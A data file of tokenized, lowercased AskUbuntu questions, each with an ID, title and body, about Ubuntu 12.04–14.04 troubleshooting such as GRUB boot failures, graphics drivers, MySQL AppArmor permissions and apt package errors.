451574	weird symbol on gnome-terminal profile preferences window	strange symbol appears on the gnome-terminal 's profile preferences window . is this a bug ? is that possible to get the symbol out ?
451577	unable to get ubuntu one working	i ca n't find ubuntu one in my ubuntu 14.04 installation , i get this in the app center there isn’t a software package called “ubuntuone-control-panel-qt” in your current software sources .
451579	different behaviour in 12.04 and 14.04 when laptop lid closed with external monitor	i upgraded from 12.04 to 14.04 , and notice a different behaviour in multi-monitor mode . in 12.04 , when i plugged in the external monitor and then closed the laptop lid , the laptop would not suspend and i could work with the external monitor , but when i removed the external monitor , i could suspend by closing the lid . in 14.04 , when i close the lid the laptop suspends . i want to get back to the original behaviour : i.e . : close lid when monitor present = do nothing ; close lid with no monitor = suspend . this question how can i tell ubuntu to do nothing when i close my laptop lid ? gives solutions to always prevent the laptop from suspending , my question is specifically about different behaviours depending on whether a monitor is attached . my laptop is a thinkpad edge 13 with intel integrated graphics ( i found a similar question but referring to ubuntu 11.04 problems with external monitors on my laptop , the answer mentions a problem with the kernel )
451580	is actual version of chromium browser ( 34.0.1847.116 ) compatible with oracle java 7 browser plugin ?	i can not make it work nor find an official confirmation of compatibility . oracle java 7 plugin works fine with firefox but fresh chromium browser installation does not even list it at chrome : //plugins
451582	grub rescue - error : unknown filesystem , no such partition	i have been dual booting windows 7 and ubuntu . i ran out of space on my c : today , and decided to format the partition that ubuntu was on . i then downloaded a third party disk manager and created a new partition with the free space and merged it with my d : data . i then split my d : , creating 40 gb on the right of my c : . i tried to merge that 40 gb partition with my c : then exited the disk manager , but nothing seemed to have happened , i checked and my c : still only had 5 gb of free space . so i restarted my laptop but when it booted up , it went straight to the unknown filesystem error . i 've tried a few of the solutions i 've found through googling , but after the insmod normal bit , it always gives error : no such partition . what can i do from here please ?
451583	gnome 3 shell - launcher displayed in center of the screen	i have had this issue with ubuntu 13.10 and now 14.04 lts . when i first boot up , everything is good , but after a while , the gnome 3 launcher is displayed in the center of the screen when i display `` activities '' . i have not been able to determined what causes this bug to appear because , again , it does not happen at first after startup . has anyone else seen this ? any suggestion on fixes ?
451584	mysql on ubuntu 14.04 problem with apparmor permissions for data directory	i 've been using mysql with a different location for the database date since ubuntu 12.04 and had no problems . my configuration was like this : data in /home/db/mysql link in the default location sudo ln -s /home/db/mysql /var/lib/mysql added /home/db/** rwk , to /etc/apparmor.d/usr.sbin.mysqld it worked great until ubuntu 14.04 . i 've been struggling all day but ca n't seem to get it to work . it seems like apparmor is not giving requested permissions to mysql on /home/db folder , since if i do chmod 777 -r /home/db it works . otherwise , i get this : $ sudo service mysql start start : job failed to start and the log : 140420 22:42:56 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140420 22:42:56 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 140420 22:42:56 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 140420 22:42:56 innodb : the innodb memory heap is disabled 140420 22:42:56 innodb : mutexes and rw_locks use gcc atomic builtins 140420 22:42:56 innodb : compressed tables use zlib 1.2.8 140420 22:42:56 innodb : using linux native aio 140420 22:42:56 innodb : initializing buffer pool , size = 128.0m 140420 22:42:56 innodb : completed initialization of buffer pool 140420 22:42:56 innodb : highest supported file format is barracuda . 140420 22:42:57 innodb : waiting for the background threads to start 140420 22:42:58 innodb : 5.5.35 started ; log sequence number 242217316 140420 22:42:58 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 140420 22:42:58 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 140420 22:42:58 [ note ] server socket created on ip : '127.0.0.1 ' . 140420 22:42:58 [ error ] /usr/sbin/mysqld : ca n't find file : './mysql/host.frm ' ( errno : 13 ) 140420 22:42:58 [ error ] fatal error : ca n't open and lock privilege tables : ca n't find file : './mysql/host.frm ' ( errno : 13 ) 140420 22:42:58 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140420 22:42:58 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 140420 22:42:58 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 140420 22:42:58 innodb : the innodb memory heap is disabled 140420 22:42:58 innodb : mutexes and rw_locks use gcc atomic builtins 140420 22:42:58 innodb : compressed tables use zlib 1.2.8 140420 22:42:58 innodb : using linux native aio 140420 22:42:58 innodb : initializing buffer pool , size = 128.0m 140420 22:42:58 innodb : completed initialization of buffer pool 140420 22:42:59 innodb : highest supported file format is barracuda . 140420 22:42:59 innodb : waiting for the background threads to start 140420 22:43:00 innodb : 5.5.35 started ; log sequence number 242217316 140420 22:43:00 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 140420 22:43:00 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 140420 22:43:00 [ note ] server socket created on ip : '127.0.0.1 ' . 140420 22:43:00 [ error ] /usr/sbin/mysqld : ca n't find file : './mysql/host.frm ' ( errno : 13 ) 140420 22:43:00 [ error ] fatal error : ca n't open and lock privilege tables : ca n't find file : './mysql/host.frm ' ( errno : 13 ) 140420 22:43:01 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140420 22:43:01 [ note ] plugin 'federated ' is disabled . /usr/sbin/mysqld : ca n't find file : './mysql/plugin.frm ' ( errno : 13 ) 140420 22:43:01 [ error ] ca n't open the mysql.plugin table . please run mysql_upgrade to create it . 140420 22:43:01 innodb : the innodb memory heap is disabled 140420 22:43:01 innodb : mutexes and rw_locks use gcc atomic builtins 140420 22:43:01 innodb : compressed tables use zlib 1.2.8 140420 22:43:01 innodb : using linux native aio 140420 22:43:01 innodb : initializing buffer pool , size = 128.0m 140420 22:43:01 innodb : completed initialization of buffer pool 140420 22:43:01 innodb : highest supported file format is barracuda . 140420 22:43:01 innodb : waiting for the background threads to start 140420 22:43:02 innodb : 5.5.35 started ; log sequence number 242217316 140420 22:43:02 [ note ] server hostname ( bind-address ) : '127.0.0.1 ' ; port : 3306 140420 22:43:02 [ note ] - '127.0.0.1 ' resolves to '127.0.0.1 ' ; 140420 22:43:02 [ note ] server socket created on ip : '127.0.0.1 ' . 140420 22:43:02 [ error ] /usr/sbin/mysqld : ca n't find file : './mysql/host.frm ' ( errno : 13 ) 140420 22:43:02 [ error ] fatal error : ca n't open and lock privilege tables : ca n't find file : './mysql/host.frm ' ( errno : 13 )
451586	maas in vmware workstation environment to boot vm guests	installed and configured maas . i was able to successfully deploy ubuntu as vm guest . however , once deployed , vm guest ( u ! [ enter image description here ] [ 1 ] buntu ) , in about 10 - 15 seconds , powers itself off complaining on ipmi . errors : starting ipmi event daemon could not open device at /dev/ipmi0 or /dev/ipmi/0 or /dev/ipmidev/0 : no such file or directory modprobe : error : could not insert 'ipmi_si ' no such device now , i did configure power type based on maas documentation . however , i am not clear if libvirt-bin needs to be installed on vm guest or on maas server ? if on vmguest , it is not staying up long enough to get package + ssh keys installed ( gets powered off in 10-15 sec after the boot , complaining on ipmi ) . thanks ! ! alex
451587	problem with ubuntu 14.04 videos	i have both ubuntu 14.04 and windows 7 installed on my computer . ubuntu videos worked fine after the installation . however , after i booted windows , it check the disk for errors . now i boot ubuntu again , video did not work properly . each time i drag the slider , it crashes . i tried vlc . same problem . any suggestion ? thanks
451588	after 14.04 install and updating driver i only get the background and eventual crash , what should i do now ?	i am as new as you can be when it comes to using linux . i heard ubuntu was the most popular linux os so i figured why not give it a try . after a few minor issues i managed to dual boot my windows vista computer with ubuntu 14.04 but i noticed that everything was really slow . my system specs are as follows : amd phenom 9550 quadcore 2.2 ghz 4 gigs of ram ati radeon hd 4600 series graphics card 64-bit processor these specs should be up to par for running the os i assume , but the computer is about 5 years old . basically i read that to enhance my performance i needed to update my graphics drivers through the additional drivers application , but there were no drivers on the list which led me to believe that my graphics card was n't supported by the current version . i then installed fglrx manually and restarted my computer . now whenever i boot ubuntu ( and i 've tried it on both unity and gnome ) i only get my background and my mouse . ctrl-alt-t does n't work , ctrl-alt-f2 does n't work , right clicking does n't work , so at this point i assume that i ca n't do anything at all through the os and will have to reinstall a different version of ubuntu somehow without blowing up my pc . any help as to what i should do next would be greatly appreciated since my computer also seems to crash after an extended period of time ( could be 15 min could be a few hours ) . i 've also been told that waiting 10-15 min for the icons to show up could work , so i waited and then my monitor turned into some low resolution modern art ... . please help ! side note : windows vista still works ( i 'm using it now ) although it also has a chance to crash after a few hours .
451589	is there a way to get an audio key-click ?	i have a dell xps 11 laptop which has a non-mechanical keyboard . is there a way to get a simulated audio key-click every time a key is pressed ? this is needed to compensate for the lack of mechanical feedback from the actual keyboard ?
451592	upgrade 13.10 to 14.04 broke grub - now boots straight to windows 8	upgraded from a functioning dual-boot window 8.1 and ubuntu 13.10 to 14.04 . before today at startup i option to choose ubuntu or windows8.1 . the default was ubuntu , and if i waited a few seconds ubuntu 13.10 would start with no action . now machine boots straight to windows bypassing the old grub screen . from bios if i choose the right drive i get three options to boot to : windows ubuntu ubuntu , i can choose the last one and i am able to get ubuntu 14.04 up . installed boot repair and ran it info here : http : //paste.ubuntu.com/7293152/ ... . would like to get the old boot screen ... . pls help .
451593	lubuntu nm-applet wifi icon missing	i have a lubuntu ( now 14.04 ) installation . recently , i logged in to find that the wi-fi icon had disappeared , and there was some sort of a keyboard icon in it 's place . i have restarted multiple times , but it does n't fix it . i ca n't find the same applet in the panel settings , and resetting the panel did n't help . when i try to manually start nm-applet , it starts , but prints a bunch of warnings to the console : nm-applet-message : using fallback from indicator to gtkstatusicon it then starts , using ugly icons for the wi-fi connectivity symbol . what do i need to do to make it start correctly ? once it starts , why is n't it using the right icons ?
451594	how to remove usb modem safely ?	i have huwaei e1731 usb modem . ubuntu recognizes it as a modem but does not show it 's files . the file system of the modem is cdfs . do i need to safely remove this modem ? ubuntu does not show any option for removing the modem safely . so is there any way to safely remove the modem ?
451596	update error ( using apt-get install -f ) ?	so i tried updating my system , to find this pop-up error upon attempt , the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f i ran the command under sudo in the command prompt , to find this issue , reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : nvidia-settings-updates libudev0 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : tor suggested packages : mixmaster xul-ext-torbutton socat tor-arm apparmor-utils the following new packages will be installed : tor 0 upgraded , 1 newly installed , 0 to remove and 243 not upgraded . 1 not fully installed or removed . need to get 0 b/1,097 kb of archives . after this operation , 2,571 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 388724 files and directories currently installed . ) unpacking tor ( from ... /tor_0.2.4.21-1~precise+1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/tor_0.2.4.21-1~precise+1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/tor ' , which is also in package tor-browser 2.3.25-12 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/tor_0.2.4.21-1~precise+1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what can i do to fix this error and get my update underway ?
451601	grub 2.02 freezes when using razer black widow keyboard to make selection	i updated from 13.10 to 14.04 yesterday . when my system reboots/starts , i see grub . the countdown ticks away until i use the keyboard to make a selection from the list . then , the count down stops and system freezes . nothing happens . i 've given it time with no luck . if i do not press any key on the keyboard the countdown will tick away from 10 seconds and the default os will boot ( ubuntu ) . suspecting the keyboard , i unplugged it . plug in an old keyboard and restarted . i am able to make selections with no problem and enter either os . the razer keyboard works without problem while ubuntu is running . it appears grub 2.02 does not like my razer keyboard . i have tried unplugging the mouse and headset , which is plugged into the keyboard . still this does not help . any suggestions ?
451603	nautilus open files in a running gvim instance as tab	is it possible in ( unity ) ubuntu 12.04 to launch files in a running gvim instance as new tab from nautilus ? i can do that in a shell by 'gvim -- remote-tab-silent ' but i want this behavior also in nautilus . is it possible to pass the arguments ? thank you in advance .
451604	ubuntu 14.04 image preview never loads	after updating to 14.04 my image preview never shows up is this common to update ? maybe it is related to my image viewer ? can i replace the default one or if its nautilus fault , what replacement would you suggest ?
451607	ca n't boot in windows and ca n't run boot-repair after update to ubuntu 14.04	after update to 14.04 i ca n't boot in windows 8 and in grub i have only 3 options instead of 7 i had previously . also i tried to repair boot but i ca n't . running : sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update returns me : w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
451613	ethernet and wireless on dell latitude d520 stopped working after upgrade to 14.10	i have a dell latitude d520 that was wroking flawlessly until ubuntu 14.10 . during the installation the ethernet cable and wireless card worked but after the initial reboot the only way to connect to the internet is by using a usb external modem . here is the output of lspci : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 02:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 02:01.0 cardbus bridge : o2 micro , inc. cardbus bridge ( rev 21 ) 02:01.4 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) any help you can give would be great .
451616	ca n't update to 14.04 because software updater ca n't set new software channels	i tried updating to ubuntu 14.04 today , but software updater seems to be having some issues . first of all , i get the following message while the updater is preparing the update : third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . i 'm not sure if this is an issue , but it seems suspicious . then , when the updater moves on to setting new software channels , the entire process stops and i get this message : w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_universe_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_main_binary-amd64_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-i386_packages hash sum mismatch , w : failed to fetch http : //archive.canonical.com/dists/trusty/release unable to find expected entry 'parter/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) , e : some index files failed to download . they have been ignored , or old ones used instead . i would like to update to 14.04 and this is preventing my update . help would be greatly appreciated .
451620	how to completely remove kubuntu-desktop from ubuntu	i installed kubuntu-desktop just to experiment with its interface . then i decided to remove and did the traditional apt-get purge and autoremove but it seems elements of kubuntu are still there . for example interface elements , scrollbars , bootscreen etc are still there . is there any method i can completely remove without installing a fresh copy of ubuntu ?
451621	when i enter my password , it take a long time to show desktop elements ?	i 've upgraded recently ( 13.10 - > 14.04 ) . uname -r 3.13.0-24-generic the thing that annoy me is the time for dropping into desktop , it take more than 10 seconds ! is this problem related to lightdm ? however , can it be solve : a little fast ?
451622	help removing ubuntu 12.10 !	i have ubuntu 12.10 on my laptop , no windows . i have my system disks and tried to do a system recovery and it wo n't allow me . i 've tried creating a boot disk and doing the `` try ubuntu '' and installing the os uninstaller . my laptop freezes up in this process . any other suggestions on how to remove ubuntu and reinstall my windows vista again ?
451623	ubuntu 14.04 , 13.10 and 13.04 have terribly slow graphic performance	i think i 've asked and googled this a lot of times . so many that i 've lost the count . anyway i have installed the three versions that i mentioned above and they all have the same issue and it is that the graphics are super slow . yet on ubuntu 12.04 and even with windows 8 the performance is smooth . i 've learnt from what i 've read so far that it is due to the graphics card or something because they appear not to pick up or to recognize my graphics card and they 're using this : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) this netbook has a closed-source driver which is the cedarview-dm or something like ( i do n't remember very well ) i have an asus 1015cx with a intel® atom™ cpu n2600 @ 1.60ghz × 4 processor . i need help . how do i solve this ? it 's just that everything runs very slowly . thanks
451628	disable bottom buttons on lenovo touchpad	i just switched to a lenovo thinkpad t530 which has the two sets of buttons , one above and one below the touchpad . i never use the bottom row and because of their proximity to the edge i often trigger them accidentally with my body . is there a way i can turn these buttons off ? i 've come across this , but i 'm not sure which buttons i would have to disable there . i 've tried xinput test < id > and would assume that the ids are 1 and 3 , but what confuses me is that the top row buttons do n't cause any output . edit : i actually just tried disabling 1 and 3 and it works â the bottom ones are disabled , the top ones not . now i wonder , though , just for the sake of knowing , how i would adress the top row buttons ? edit # 2 : disabling those two buttons unfortunately also disabled clicking by tapping the touchpad â a feature i 'd like to keep . : /
451629	after upgrading to ubuntu 14.04 , indicator applets are not showing in lxde	after i updated to ubuntu 14.04 and i use lxde as my main de . the indicator applet is not showing anymore even though i listed in the add / remove panel items . anyone is also facing this problem ? : )
451630	ubuntu 14.04 boot hangs at `` ext4-fs : mounted filesystem without journal ''	i have just made a new ubuntu 14.04 installation on a new ssd drive for my server . previously i had a ubuntu 12.04 installation that worked fine , but i have now changed harddrive to an ssd . the installation process completes without any problem . i do a manual partitioning with one boot partition ( 100mb ) , one swap ( 2gb ) and the rest ( ca . 60 gb ) for root partition . when the system then boots it goes normal for some time and then stops at the point showed i picture : ( ext4-fs ( sdg1 ) : mounted filesystem without journal . opts : ( null ) ) . ubuntu 14.04 - boot log what can i do to fix it ? what is wrong ? why does it not boot ?
451631	nvidia-173 driver package comes with a wrong and useless nvidia-settings app	i never understood why the nvidia-173 and/or nvidia-96 driver packages come together with some useless nvidia-settings package which shows a different version namely 'nvidia-settings 304 ' or 'nvidia-settings 331 ' or other version except for the actual nvidia-settings-173 version which is needed by the nvidia-173 driver to work . i was never able to use 'nvidia-settings ' after installing the video drivers from ubuntu repos to modify resolution or monitor frequency for the simple reason that it is an incompatible 'nvidia-settings ' version for the 'nvidia-173 ' driver . the same thing happened to me when using a different card which needed 'nvidia-96 ' driver package . i am sure this is not a bug because microsoft 's finest are using for decades the same policy to push us , the little people , to change our ancient `` hardware '' . i suppose there is not much to do to make nvidia-settings work with 'nvidia-173 ' driver except to download a driver from nvidia support page and install it the hard way ? and this is most difficult or even impossible to do in ubuntu 14.04 because i suspect i need a patch or something close to it to be able to install the driver for my video card downloaded from nvidia.com .
451633	origin wo n't load through wine	i have origin installed . when i go to open it it flickers like it 's going to open but then wine closes and origin does n't load . i 've read the wine boards and the ubuntu boards and nothing is helping . i 've read the thread on the issue with origin and playonlinux does n't even recognize origin exists . i 've also read the threads on installing programs through wine and that does n't help at all either . i 'm running wine 1.7 as the wine hub suggests . i could use some help with this .
451634	can not locate firefox helper location	i want to use specific applications to open files in firefox . where do i direct the helper application preference to to find that application ?
451636	ubuntu suitable for web designer or web developer ?	is ubuntu suitable for web designer and web developer ? i mean cross-browsing , comfortable work . i would like to see reviews from web designers or web developers about their experience working in ubuntu .
451637	tv streaming on ubuntu	i need to get access to some traditional tv channels ( example : cnn , bbc , discovery , history , national geographic , zdf .. etc ) but i do n't live in europe so i ca n't zattoo.. joost does n't seem to be downloadable on ubuntu and miro is only good for podcasts and stuff like this . so , what could be the solution ? ps : tried both tv-maxe and sopcast which are basically the same thing , with no use for other than some romanian channels .
451638	ubuntu 14.04 loads to purple screen on lenovo g505s . nomodeset wont work	i have a lenovo g505s graphics card is amd radeon hd 8550g with windows 8.1 pre installed ( not my favorite os ) . i disabled secure boot , changed uefi to legacy mode . then i loaded and successfully installed ubuntu alongside windows . when the computer restarted it brought me to the grub menu , when i select ubuntu i get a frozen purple screen ... if i try secure mode i get the same purple screen with `` loading linux 3.13.0-24-generic than loading initial ramdisc ... '' and it freezes . i have tried pressing e and changing quiet splash with nomodeset , and i still get a purple screen of death . i know that its probably a graphics card issue but have no idea how to fix it ... please help
451639	aptitude - both 64 & 32-bit packages being selected	in aptitude , i selected the xubuntu-desktop task and was presented with a large number of package conflicts , per this example : it seems that both the 32- and 64-bit versions of packages are being selected and the resolver does n't seem to know what to do about it . i can manually de-select the i386 version of each of the conflicting packages but that will be a lengthy task . is there a way to do one or both of the following ? bulk-deselect the 32-bit versions wherever a 64-bit version has also been selected ? prevent this situation in the first place ? update 1 per @ luis alvarado 's suggestion below , i ran aptitude install xubuntu-desktop direct from the command line and it seems to have not hit any conflicts - so my immediate issues have been resolved . still , i 'll leave this question open for now as i 'm interested as to why i 'm encountering this behaviour in the curses ui . update 2 even with using the command line rather than the ncurses gui i now have a problem where the updates for all the stuff that had been selected in the gui wo n't apply because of the conflict between the 32-bit and 64-bit packages . eeek . how do i get around this without manually resolving the conflicts 1 at a time ?
451643	can not access screen lock in ubuntu 12.04 ?	the brightness and lock screen can be displayed , but the screen lock portion is grayed out so that i can not unlock the screen . this is a new problem that had not surfaced before on ubuntu 12.04 .
451644	how can i edit the client-menu menu of openbox ? ( invoked by alt + space )	i would like to remove the following items in the openbox client menu : send to desktop restore move resize iconify maximize roll up/down un/decorate this is the menu you can invoke by right clicking on the window decorations or with alt + space . is there any way i can achieve this ?
451649	teamviewer 9 does not have permission to launch in ubuntu	i installed teamviewer 9 but when i try to launch it from terminal by typing teamviewer i get the following init ... /opt/teamviewer9/tv_bin/script/tvw_main : line 42 : /home/cheng/.config/teamviewer9/logfiles/startup.log : permission denied error : init failed . please check '/home/cheng/.config/teamviewer9/logfiles/startup.log' the log file only contains the the following : teamviewer : 9.0.27891 - deb profile : /home/cheng ( root ) desktop : ds : '' xdg : '' xserver tty : 7 distarch : x86_64 ( loader : [ x ] ld32 [ x ] ld64 ) distribution : distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy ok ( info ) ok ( profile ) how can i fix this ? i can launch it with the command `` sudo teamviewer '' but i want it to be able to launch automatically when the computer starts .
451651	ca n't install boot-repair on live-usb	had boot problems so decided to try installing boot repair , now even that and i 'm getting and error when downloading it , can somebody help ? http : //pastebin.com/rkxnveme edit : - thanks , i was able to install it but now i used `` sudo chroot `` /mnt/boot-sav/sda5 '' apt-get install -y -- force-yes grub-pc linux '' as instructed i get reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux
451655	upgrading to 14.04 did n't update my kernel	i 've updated my ubuntu version from 13.10 to 14.04 last week using the update-manager . however , my kernel version did not update : $ uname -r 3.11.0-12-generic $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty this makes virtualbox and any other thing that needs updated linux-headers to not work ( the old 3.11 linux-headers are not present in the repo ) . i know this but i want to use the default kernel that came with trusty ( i think it 's 3.13.0-24 ) , so that i know everything is supported . how can i update my kernel to the correct version ?
451660	archos g9 3g stick is not recognized	when i connect the archos g9 3g stick to my pc ( ubuntu 12.04 ) it is not recognized . how do i get it to work ? does it work with ubuntu 14.04 ?
451661	disable a touch screen button on dell xps 11	i have installed ubuntu 14.04 on my dell xps 11 and it is all running well except there is a windows button ( super ) on the bottom of the touch screen . this is extremely sensitive and whenever i go near it , it minimizes all my windows and opens the dashboard . i am trying to disable this key , i have tested and using showkey it appears to register as keycode 125 , which is the same as the super key on the actual keyboard . so my question is can i disable one without affecting the other and if so how would you recommend going about this ? thanks in advance : - )
451662	when i start the ubuntu iso , initramfs says `` unable to find a medium containing a live file system ''	when i start the ubuntu iso ( 13.10 ) on a usb , initramfs says `` unable to find a medium containing a live file system '' . these are my pc specs : http : //pcpartpicker.com/user/poniesfim/saved/39dy i have windows 8.1 ( 64 bit , with update 1 ) installed on this computer . other computers that i tried with the same usb did n't give the error . what i tried to fix this : switching from ide to ahci ( i already did it before on this computer ) . using other usb ports . switching from usb 3.0 to 2.0 ( and backwards ) . switching from uefi to legacy ( and backwards ) . nothing that i know works right now . are there any possible solutions ?
451664	unable to locate package linux	started boot-repair on live-usb , removed grub , and then was instructed to write in terminal sudo chroot `` /mnt/boot-sav/sda5 '' apt-get install -y -- force-yes grub-pc linux but i get : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux and it says grub is still absent .
451666	ubuntu server 14.04 install gnome flashback without installing unity ?	ive been experimenting in a qemu/kvm vm , i want to install a normal installation of ubuntu server 14.04 and then install gnome-flashback on top of it so that i can possibly put this setup on my workstation . i have been able to install mate-desktop on top of ubuntu server 13.10 , but it is not working very well with flashback . is this even possible ?
451668	gdm & lightdm not working after xorg configured	i have an r9 280x set up & it was previously running successfully . recently i installed latest drivers ( both the beta & stable - not at same time ) and ran the command . sudo amdconfig -- initial -f -adapter=all this command is successful and it says that it found an unconfigured xorg and has configured it . then i rebooted . then nothing . when ubuntu boots it gets stuck at blank screen with cursor flashing in top left corner . when i deleted xorg.conf and rebooted the system rebooted to gdm login successfully . to fix this i have tried removing lightdm & gdm and reinstalling both to no effect . the following is my xorg.conf file after running the command above : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:3:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection how do i get gdm or lightdm to start automatically at boot up when xorg.conf is configured with the amd drivers ?
451669	trusty 's first login keyboard cheat-sheet : can i see it again ?	after upgrade to 14.04 trusty i got a nice `` cheat sheet '' for unity keyboard shortcuts . i saw it briefly after login . changing the display brightness on my laptop made it disappear already . can i see that exact window with the shortcuts again ?
451672	installing and testing cuda in ubuntu 14.04	i am uncertain about how to install cuda in my system . looking around there are many tutorials about cuda on 12.04 lts and a few on 13.04 and 13.10 , but they all talk about acquiring a deb package from the nvidia cuda developer zone . well nvidia does not offer a debian package for 14.04 as of yet . however , there is a promising package in apt repository : nvidia-cuda-toolkit . the problem is that i did n't find any example with it . at least not the examples that are referred to in cuda6 online documentation section 4.11 . i should mention that the toolkit installed is v5.5 , not v6 but i have n't found documentation for cuda v5.5 on the nvidia website . so i can verify that nvcc is there , but nothing further than that . how can i get some examples to run to verify the cuda is installed properly ?
451673	default username/password for ubuntu cloud image ?	i have downloaded and launched an instance of this image in openstack http : //cloud-images.ubuntu.com/releases/13.10/release-20140226/ubuntu-13.10-server-cloudimg-amd64-disk1.img but i do n't know the password of this . can anyone tell me ?
451674	ca n't install apache2 again	i have previously had apache2 installed , i upgraded to php5.5 and this broke my install so i tried to fix a few files . but that didnt work , i autoremoved apache but i still get this error when i try to install : /etc/init.d/apache2 : 64 : . : ca n't open /etc/apache2/envvars /etc/init.d/apache2 : 76 : . : ca n't open /etc/apache2/envvars error : apache_pid_file needs to be defined in /etc/apache2/envvars invoke-rc.d : initscript apache2 , action `` restart '' failed .
451678	display settings problems with ubuntu 14.04 lts	for whatever reason ( this was working correctly on ubuntu 12.04 lts ) when i try to set my displays on top of each other in the settings , it wo n't allow to place them on top of each other . when i click `` apply '' i get the error message `` could not set configuration mode for crtc 63 . '' can anybody help me with this ? it wont let me set the two displays on top of each other , but it will allow me to place them side to side . also , i get a random `` unknown display '' as well . this was not existent in 12.04 lts and i have no idea what it is , seeing as how the only screens that are in use , or plugged up for that matter , is my laptop 's display ( 1366x768 ) and my samsung tv display ( 1360x768 ) thru hdmi .
451680	ubuntu scripts/init.bottom hang	i am trying to boot my 12.04 ubuntu server , and i am getting hung on : begin : running /scripts/init-bottom ... done . this is in a vm on hyperv . i have tried fsck , tried going into recovery mode and `` repairing file system '' , tried dropping to root , it wo n't let me type the password in . says it 's incorrect . it loads a bunch of really odd characters when trying to do anything in recovery mode . i think the file system is really jacked up . here 's what i see on the affected system from a live cd . do you see all the weird character files ? i think thats what is affecting it . https : //www.dropbox.com/s/cv96plwx1mhpu83/screenshot % 202014-04-20 % 2017.53.47.png from boot repair disk : http : //paste.ubuntu.com/7294909/ can someone help me get this thing to boot ? !
